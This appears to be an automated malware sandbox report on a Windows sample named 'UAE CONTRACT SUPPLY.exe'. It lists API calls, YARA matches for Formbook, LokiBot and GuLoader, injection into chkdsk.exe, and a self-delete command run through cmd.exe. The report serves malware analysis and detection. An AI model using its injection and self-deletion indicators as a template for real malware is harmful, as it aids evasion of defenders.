      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5097A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5098F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5099A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5096D0 NtCreateKey,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50A770 NtOpenThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509760 NtOpenProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509560 NtWriteFile,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5095D0 NtClose,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5095F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A10 NtQuerySection,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5098A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E509950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5099D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00565DCB NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566266 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566455 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_0056641E NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005664FB NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005664A4 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566566 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_0056626E NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566629 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005662C5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005662EA NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_0056629C NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00566335 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005663F8 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005663A0 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005663AA NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F95D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9560 NtWriteFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056FA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF81B0 NtCreateFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF82E0 NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF8260 NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF8390 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF82DA NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF825A NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF838A NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00401348
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0040139A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58D616
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E6E30
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E592EF7
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E591FF1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58D466
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D841F
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E591D55
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E592D07
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C0D20
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5925DD
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DD5E0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5922AE
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E592B28
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58DBD2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FEBB0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581002
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5928EC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB090
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5920A8
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CF900
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05781D55
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B0D20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05782D07
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CD5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057825DD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577D466
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C841F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05781FF1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578DFCE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D6E30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577D616
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05782EF7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BF900
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578E824
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771002
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057828EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057820A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB090
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAB40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05782B28
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577DBD2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057703DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EEBB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0576FA2B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057822AE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFC878
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFCBE6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFCBE3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE8C50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE8C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE2D90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB5BB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE2FB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 056BB150 appears 54 times
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: String function: 1E4CB150 appears 35 times
      Source: UAE CONTRACT SUPPLY.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.390017315.0000000002C30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVrdihftetgo6.exeFE2XTred6 vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389503842.0000000002230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514676013.00000000000B6000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000000.388321692.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519498317.000000001DED0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.515245595.0000000002460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exeBinary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
      Source: UAE CONTRACT SUPPLY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/0@10/4
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1068:120:WilError_01
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile created: C:\Users\user\AppData\Local\Temp\~DF36513EDB16C1AC61.TMPJump to behavior
      Source: UAE CONTRACT SUPPLY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: UAE CONTRACT SUPPLY.exeVirustotal: Detection: 33%
      Source: UAE CONTRACT SUPPLY.exeReversingLabs: Detection: 36%
      Source: unknownProcess created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
      Source: Binary string: chkdsk.pdbGCTL source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: UAE CONTRACT SUPPLY.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6848, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6848, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409C7D push ss; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0040B823 pushfd ; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409D6C push ebx; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409D7E push ss; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409E5B push ss; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00407341 push ebx; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409F49 push ss; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0040A765 push 00000062h; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0040B370 push eax; ret
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226005D push FFFFFFB9h; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02260130 push FFFFFFB9h; retf
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E51D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0570D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF519C push esi; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE6108 push cs; iretd
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFCA50 push 0000005Ah; ret
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB3FB push eax; ret
